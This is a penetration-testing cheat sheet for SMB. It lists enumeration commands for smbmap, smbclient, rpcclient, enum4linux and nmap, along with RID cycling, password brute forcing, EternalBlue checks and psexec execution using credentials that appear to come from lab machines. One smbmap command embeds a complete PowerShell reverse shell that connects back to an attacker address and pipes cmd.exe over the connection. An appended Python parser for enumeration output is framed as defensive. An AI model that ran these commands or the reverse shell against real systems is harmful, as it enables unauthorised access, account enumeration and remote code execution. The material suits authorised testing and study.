
Pentesting SMB

SMB Enumeration

  • SMB (Server Message Block) is a network file sharing protocol that provides access to shared files and printers on a local network.

  • When a client and server run different operating systems or SMB versions, the highest version supported by both sides is used for the session.

  • SMB uses the following TCP and UDP ports:

netbios-ns   137/tcp  #NetBIOS Name Service
netbios-ns   137/udp
netbios-dgm  138/tcp  #NetBIOS Datagram Service
netbios-dgm  138/udp
netbios-ssn  139/tcp  #NetBIOS Session Service
netbios-ssn  139/udp
microsoft-ds 445/tcp  #SMB directly over TCP, used with Active Directory

SMB Checklist

  • Basic Commands

  • From the smbclient prompt

  • View/Get Files

get services.txt
more services.txt
  • Enumerate Hostname

nmblookup -A $ip
  • List Shares

smbmap -H $ip
smbclient -L 10.129.101.197 -U Administrator
nmap --script smb-enum-shares -p 139,445 $ip
  • Connect to a listed share

smbclient \\\\10.129.101.197\\C$ -U Administrator
smbclient \\\\$ip\\[share name]
  • Check Null Sessions

smbmap -u anonymous -H 10.10.115.116
smbmap -H $ip
rpcclient -U "" -N $ip
  • With authentication

smbmap -u svc-admin -p management2005 -H 10.10.248.93
  • Check for Vulnerabilities

nmap --script smb-vuln* -p 139,445 $ip
  • Overall Scan

enum4linux -a $ip
  • Get a shell with smbmap (windows)

smbmap -u jsmith -p 'R33nisP!nckle' -d ABC -h 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' 
  • Brute Force SMB

medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip  -vvvv

smbmap

  • smbmap is one of the best ways to enumerate Samba/SMB. Given sufficient permissions it lets a pen-tester run commands and download and upload files, and it is useful for SMB enumeration in general.

smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"
  • -s -> specify the share to enumerate

  • -d -> specify the domain to enumerate

  • --download -> downloads a file

  • --upload -> uploads a file

smbclient

  • List shares

smbclient -L 10.10.115.116
  • smbclient allows you to do most of the things you can do with smbmap, and it also offers an interactive prompt.

  • -w -> specify the domain(workgroup) to use when connecting to the host

  • -I -> specify the ip address of the host

  • -c "ipconfig" -> would run the ipconfig command on the host

  • -U -> specify the username to authenticate with

  • -P -> specifies the password to authenticate with

  • -N -> tells smbclient to not use a password

  • get test -> would download the file named test

  • put /etc/hosts -> would put your /etc/hosts file on the target

  • Syntax:

  • To see which shares are available on a given host, run:

 /usr/bin/smbclient -L 10.10.10.10
  • For example, if you are trying to reach a directory that has been shared as 'public' on a machine called 10.10.10.10, the service would be called \\10.10.10.10\public.

  • However, because the shell treats backslashes as escape characters, you need to escape them, so you end up with something like this:

/usr/bin/smbclient \\\\10.10.10.10\\public mypasswd
  • To authenticate with a null session (empty password)

smbmap -u 'root' -p '' -H 10.10.232.5 -x 'ip addr'
  • smbclient with domain credentials

smbclient -U 'RLAB\ngodfrey' -p 445 -L 127.0.0.1

rpcclient

  • A tool for executing client-side MS-RPC functions. A null session is a connection to a Samba or SMB server that does not require authentication with a password.

rpcclient -U "" [target ip address]
  • The -U "" option specifies an empty username. You will be prompted for a password; leave it blank and press Enter.

  • The command line will change to the rpcclient context

rpcclient $>
  • To retrieve some general information about the server like the domain and number of users:

querydominfo
  • This command returns the domain, server, total users on the system and some other useful information.

  • Also shows the total number of user accounts and groups available on the target system.

  • To retrieve a list of users present on the system

enumdomusers
  • The result is a list of user accounts available on the system with the RID in hex. We can now use rpcclient to query the user info for more information:

lookupsids #convert SIDs to names
lookupsids S-1-5-21-3981879597-1135670737-2718083060-1002
lookupnames #convert names to SIDs
lookupnames Bill
queryuser 0x47f #use the user's RID from the enumdomusers output
queryusergroups 0x47b #use the user's RID to see their group membership
querygroup 0x47c #use the group RIDs returned by queryusergroups for this query
enumprivs
found 35 privileges
SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)
  • Enumerate the privileges known to the target box

getusername
Account Name: Guest, Authority Name: RELEVANT
  • Get username you are running as

queryuser [username]
username=pbx
queryuser pbx, queryuser 1000, queryuser 0x3e8

  • This command returns information about the user's profile path on the server, home drive, password-related settings and a lot more. The user can be given by name, decimal RID or hex RID.

  • To see an overview of all enumeration commands, type enum at the rpcclient prompt and press Tab twice.

  • If you get an error that says:

Cannot connect to server.  Error was NT_STATUS_CONNECTION_DISCONNECTED
  • This occurs because the minimum protocol version for the Samba client has been set to SMB2_02, which the target does not offer.

  • Fix with:

sudo vim /etc/samba/smb.conf
  • Add the following line to the config under the [global] section

client min protocol = CORE
  • An alternative to enumdomusers is RID cycling.

  • To determine the domain's full SID, look up a known name with the lookupnames command:

lookupnames pbx
  • There are two sets of RIDs: 500-1000 for built-in system accounts and 1000-10000 for domain-created users and groups.

  • If we append -500 to the domain SID and look it up with the lookupsids command, we get the following output:

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-500
S-1-5-21-532510730-1394270290-3802288464-500 *unknown*\*unknown* (8)
  • This SID resolves as unknown, so increase the RID by one

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-501
S-1-5-21-532510730-1394270290-3802288464-501 PBX\nobody (1)
  • That finds a valid account; now increase the RID to 1000, where domain-created users start.

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-1000
S-1-5-21-532510730-1394270290-3802288464-1000 PBX\pbx (1)
  • We now have the full SID of the user account, and can keep incrementing the RID to find further accounts.

lookupsid.py Username Enumeration

  • Impacket's lookupsid.py brute-forces Windows SIDs to identify the users and groups on the remote target.

  • You need to be able to connect to IPC$ without authentication or with a known password and username

python3 lookupsid.py anonymous@10.10.11.35 | tee users.txt
Password:
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Brute forcing SIDs at 10.10.11.35
[*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
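As an added example (not part of the original page or of Impacket), a Python parser for the two user-listing formats above: rpcclient's enumdomusers lines (hex RIDs) and lookupsid.py's output (decimal RIDs). It normalises both into one record type, keeps only human user accounts, and reports unused RIDs in the domain-created range the page describes; the sample lines and domain SID are constructed, and a defender can run the same parser over their own output to review exactly what an anonymous IPC$ session exposes.

```python
import re
from dataclasses import dataclass

# Constructed sample input in the two formats the page shows: rpcclient's
# enumdomusers (hex RIDs) and Impacket lookupsid.py (decimal RIDs). Names and
# domain SID are made up for this example.
ENUMDOMUSERS_OUTPUT = """\
user:[Administrator] rid:[0x1f4]
user:[pbx] rid:[0x3e8]
"""
LOOKUPSID_OUTPUT = """\
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
500: CICADA\\Administrator (SidTypeUser)
512: CICADA\\Domain Admins (SidTypeGroup)
1000: CICADA\\CICADA-DC$ (SidTypeUser)
1104: CICADA\\john.smoulder (SidTypeUser)
1106: CICADA\\michael.wrightson (SidTypeUser)
"""
ENUMDOMUSERS_RE = re.compile(r"user:\[([^\]]+)\]\s+rid:\[(0x[0-9a-fA-F]+)\]")
LOOKUPSID_RE = re.compile(r"^(\d+):\s+[^\\]+\\(.+?)\s+\((SidType\w+)\)$")
DOMAIN_SID_RE = re.compile(r"Domain SID is:\s+(S-1-5-21-\d+-\d+-\d+)")

@dataclass(frozen=True)
class Principal:
    rid: int
    name: str
    kind: str  # SidTypeUser, SidTypeGroup or SidTypeAlias

def parse_enumdomusers(text):
    # rpcclient prints RIDs in hex (0x3e8 == 1000); every entry is a user.
    return [Principal(int(rid, 16), name, "SidTypeUser")
            for name, rid in ENUMDOMUSERS_RE.findall(text)]

def parse_lookupsid(text):
    # Returns (domain SID, principals) parsed from lookupsid.py output.
    sid, found = None, []
    for line in text.splitlines():
        if m := DOMAIN_SID_RE.search(line):
            sid = m.group(1)
        elif m := LOOKUPSID_RE.match(line.strip()):
            found.append(Principal(int(m[1]), m[2], m[3]))
    return sid, found

def user_accounts(principals):
    # Human accounts only: SidTypeUser minus machine accounts (trailing $).
    users = [p for p in principals if p.kind == "SidTypeUser" and not p.name.endswith("$")]
    return sorted(users, key=lambda p: p.rid)

def rid_gaps(principals, start=1000):
    # Unused RIDs in the domain-created range (>= 1000), e.g. 1107 in the
    # page's own lookupsid.py output; normally a deleted object.
    rids = sorted(p.rid for p in principals if p.rid >= start)
    present = set(rids)
    return [r for r in range(rids[0], rids[-1] + 1) if r not in present] if rids else []
```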

Enum4linux

  • Enum4linux is a linux alternative to enum.exe and it is used to enumerate data from windows or samba hosts.

enum4linux [target ip]

  • It performs RID cycling automatically.

  • Part of autorecon!

  • Recommend redirecting (>) the output to a text file for reference; there is a lot of it.

Nmap SMB scripts

ls -l /usr/share/nmap/scripts/smb*
nmap --script=[scriptname] [target ip]
  • For smb-os-discovery:

nmap -p 139,445 --script=smb-os-discovery [target ip]
  • The first command scans the target for all SMB vulnerabilities known to Nmap's smb-vuln* scripts

  • The second checks specifically whether the target is vulnerable to EternalBlue (MS17-010)

nmap -p 139,445 --script=smb-vuln* [target ip]
nmap -p 445 [target] --script=smb-vuln-ms17-010

Finding the Password Policy

  • Various ways to find a box's password policy

crackmapexec smb 10.10.10.161 --pass-pol
crackmapexec smb 10.10.10.161 --pass-pol -u '' -p ''
enum4linux 10.10.10.161 
  • This will sometimes fail because null sessions are disabled by default on newly installed domains.

  • However, domains upgraded from Windows 2000/2003/2008 often keep null sessions enabled for backwards compatibility.

Impacket psexec command execution

psexec.py CICADA/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@10.10.11.35 dir

Last updated 6 months ago
